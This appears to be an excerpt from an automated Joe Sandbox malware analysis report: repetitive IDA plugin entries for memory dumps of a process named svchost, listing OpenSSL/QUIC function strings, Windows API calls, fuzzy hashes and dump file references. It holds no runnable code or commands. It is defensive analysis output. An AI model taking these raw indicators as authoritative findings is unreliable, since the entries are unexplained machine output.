                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: quic_app_data_pending$ssl\quic\quic_tls.c
                                                                                              • API String ID: 1552677711-2758597072
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: quic_increment_sequence_ctr$ssl\quic\quic_tls.c
                                                                                              • API String ID: 1552677711-2984182107
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: SSL_CTX_use_PrivateKey$ssl\ssl_rsa.c
                                                                                              • API String ID: 1552677711-2258079080
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: ssl\record\methods\tlsany_meth.c$tls_any_set_crypto_state
                                                                                              • API String ID: 1552677711-1973945482
                                                                                              APIs
                                                                                              • X509_get0_pubkey.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FFBAB41D570), ref: 00007FFBAB43A183
                                                                                              • EVP_PKEY_get_security_bits.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FFBAB41D570), ref: 00007FFBAB43A190
                                                                                              • X509_get0_pubkey.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FFBAB41D570), ref: 00007FFBAB43A1D2
                                                                                              • EVP_PKEY_get_security_bits.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FFBAB41D570), ref: 00007FFBAB43A1DF
                                                                                              • X509_get_signature_info.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FFBAB41D570), ref: 00007FFBAB43A253
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: X509_get0_pubkeyY_get_security_bits$X509_get_signature_info
                                                                                              • String ID:
                                                                                              • API String ID: 3773881001-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$CreateSemaphore
                                                                                              • String ID:
                                                                                              • API String ID: 4016566793-0
                                                                                              APIs
                                                                                              • GetSystemTimeAsFileTime.KERNEL32 ref: 649475B5
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 649475C0
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 649475C8
                                                                                              • GetTickCount.KERNEL32 ref: 649475D0
                                                                                              • QueryPerformanceCounter.KERNEL32 ref: 649475DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                              • String ID:
                                                                                              • API String ID: 1445889803-0
                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32 ref: 649465CE
                                                                                              • Sleep.KERNEL32(?,?,?,?,649416A0), ref: 64946602
                                                                                              • Sleep.KERNEL32(?,?,?,?,649416A0), ref: 649465F7
                                                                                                • Part of subcall function 64943070: CloseHandle.KERNEL32 ref: 6494308F
                                                                                              • _errno.MSVCRT ref: 6494662C
                                                                                              • _errno.MSVCRT ref: 6494663F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleSleep_errno
                                                                                              • String ID:
                                                                                              • API String ID: 3806203616-0
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32 ref: 64941A36
                                                                                              • LeaveCriticalSection.KERNEL32 ref: 64941A53
                                                                                              • LeaveCriticalSection.KERNEL32 ref: 64941A7A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Leave$Enter
                                                                                              • String ID:
                                                                                              • API String ID: 2978645861-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseCurrentErrorHandleLastOpen_errno
                                                                                              • String ID:
                                                                                              • API String ID: 202612177-0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free_all
                                                                                              • String ID: expect_quic$ssl\quic\quic_impl.c
                                                                                              • API String ID: 310313773-2248945671
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_zallocR_newR_set_debug
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_construct_ctos_psk_kex_modes
                                                                                              • API String ID: 905617597-4063274569
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_construct_stoc_use_srtp
                                                                                              • API String ID: 0-4262462768
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_parse_ctos_psk_kex_modes
                                                                                              • API String ID: 193678381-1408400335
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_construct_stoc_server_cert_type
                                                                                              • API String ID: 0-3789259862
                                                                                              • Opcode ID: 21c3a3a4bb4487e34a21a0d52e51086deb9666c07572ba5d578d7e40614766c1
                                                                                              • Instruction ID: 2eedaf96f9afd895f566ebfbbd253f27c01786b8d508e2a28342ffcb13a0332d
                                                                                              • Opcode Fuzzy Hash: 21c3a3a4bb4487e34a21a0d52e51086deb9666c07572ba5d578d7e40614766c1
                                                                                              • Instruction Fuzzy Hash: A521B3A1F1D18245FB5293B6E1463F912819F457C4F088031EE794BAE7DF2DD486C302
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_construct_stoc_alpn
                                                                                              • API String ID: 0-2562604191
                                                                                              • Opcode ID: e2bb9be5eb591082602a80186975cc9e842cf4bd3fae6847177589c066f45b27
                                                                                              • Instruction ID: a9608d6f37b88b535a60b9228bcba1b27f293bdba0ae5d3b1ace9da9a8319b9f
                                                                                              • Opcode Fuzzy Hash: e2bb9be5eb591082602a80186975cc9e842cf4bd3fae6847177589c066f45b27
                                                                                              • Instruction Fuzzy Hash: 2D2190A1F0964342FB569772F9523BA1240AF547C0F088432EF6D8B7E6EE2CE8918311
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ossl_statem_server_write_transition$ssl\statem\statem_srvr.c
                                                                                              • API String ID: 0-156501081
                                                                                              • Opcode ID: 22eec64ec76cd787db3ac982d4cd720efbdf4c6106d0429dab9c7dd1a34bf672
                                                                                              • Instruction ID: d8c5a7dd5ba6eb5b98c2d34feaf59eaa7e811831571638f3d01f58d8f9945ff1
                                                                                              • Opcode Fuzzy Hash: 22eec64ec76cd787db3ac982d4cd720efbdf4c6106d0429dab9c7dd1a34bf672
                                                                                              • Instruction Fuzzy Hash: CF1175A2A0A28187E317CB39D4D52BC3B51EB85B54F88C472DF5C877A3CD6CA495C711
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_vset_error
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_construct_stoc_server_name
                                                                                              • API String ID: 1390262125-4046455571
                                                                                              • Opcode ID: ac2944453ccd839ccc3cc914e697e592a87e4940b6ca7bc7569bd65b5b45840c
                                                                                              • Instruction ID: 75e83acac98a5361d8ccb6a1d43ceb07606037ada8c72b4b301b66facbfe0095
                                                                                              • Opcode Fuzzy Hash: ac2944453ccd839ccc3cc914e697e592a87e4940b6ca7bc7569bd65b5b45840c
                                                                                              • Instruction Fuzzy Hash: 7011A2A2B1928182EBA6D776E4857FD6391EB447C4F58C431DE2C876B2DF2CD885C700
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_construct_ctos_renegotiate
                                                                                              • API String ID: 0-652228395
                                                                                              • Opcode ID: d94eb0b2ecef283a94decfd1885502cad7cdf09c7cb4966c3539a5bb948096a6
                                                                                              • Instruction ID: 6388feee5c019c1eb0974e7b74d3ab6b8afcd6bb175ce4bfa29e1e68a9f92e14
                                                                                              • Opcode Fuzzy Hash: d94eb0b2ecef283a94decfd1885502cad7cdf09c7cb4966c3539a5bb948096a6
                                                                                              • Instruction Fuzzy Hash: D711C4A1F4A24342FB669732F6467F91244AF447C4F048031EE2D4B6E7EE2CE5C18300
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_construct_ctos_maxfragmentlen
                                                                                              • API String ID: 0-3558564283
                                                                                              • Opcode ID: 32f1fd75370dc0860335a7f32e55792e5b998efdae202afceac39d9a1490f931
                                                                                              • Instruction ID: a316976b9607775b29e26298964c5844ff2863c8a38081f528040e9ae905ae5e
                                                                                              • Opcode Fuzzy Hash: 32f1fd75370dc0860335a7f32e55792e5b998efdae202afceac39d9a1490f931
                                                                                              • Instruction Fuzzy Hash: 2B118FA1B5918241FB529732E9427FA52859F457C0F08C031EE3D8BAE7ED2DE9858B00
                                                                                              APIs
                                                                                              Strings
                                                                                              • Error cleaning up spin_keys for thread , xrefs: 6494444A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDebugOutputStringThread_ultoa
                                                                                              • String ID: Error cleaning up spin_keys for thread
                                                                                              • API String ID: 2892977721-2906507043
                                                                                              • Opcode ID: d7c6b92f146a5297dce9a32d46367a64f4f2bdd00a0e22e95ee11bb5d40a8c71
                                                                                              • Instruction ID: 6273affc26e83ed8f3c49a0d043d27fd3918550a2ad95c3d4e2fd7ba9164ba49
                                                                                              • Opcode Fuzzy Hash: d7c6b92f146a5297dce9a32d46367a64f4f2bdd00a0e22e95ee11bb5d40a8c71
                                                                                              • Instruction Fuzzy Hash: A711086278868082FF258F34E41035A2BE2E74676CF540731DA68467E8DB3DC545CB01
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_vset_error
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_construct_ctos_npn
                                                                                              • API String ID: 1390262125-1587923133
                                                                                              • Opcode ID: 0c87cd5eec68373dc162cae14ffbd167cd557b2670521c11d28808d4a897c9fb
                                                                                              • Instruction ID: 5e950d78fae387a16d1ea286493c451a67b335142878e68c806d6b22316a744d
                                                                                              • Opcode Fuzzy Hash: 0c87cd5eec68373dc162cae14ffbd167cd557b2670521c11d28808d4a897c9fb
                                                                                              • Instruction Fuzzy Hash: 9E11E3A1F5918141FBA69736E5867F91294EB887C0F488131DE2C876F2DE3CDAC5C701
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_construct_ctos_post_handshake_auth
                                                                                              • API String ID: 0-2821314493
                                                                                              • Opcode ID: bac7bf4fa3fd4e0730eef9842e57bf5e69d3d4d0274f26ca452d69410104372b
                                                                                              • Instruction ID: 799ad24adac87a21139fe3b2f1d7e38b0a0abd8b9ab713c16ef1171942cb9caa
                                                                                              • Opcode Fuzzy Hash: bac7bf4fa3fd4e0730eef9842e57bf5e69d3d4d0274f26ca452d69410104372b
                                                                                              • Instruction Fuzzy Hash: 251182A1B1D14242FB629732E5467FD2294AF447C4F448431EF2C8BAE6DE2DD9C58700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_construct_stoc_session_ticket
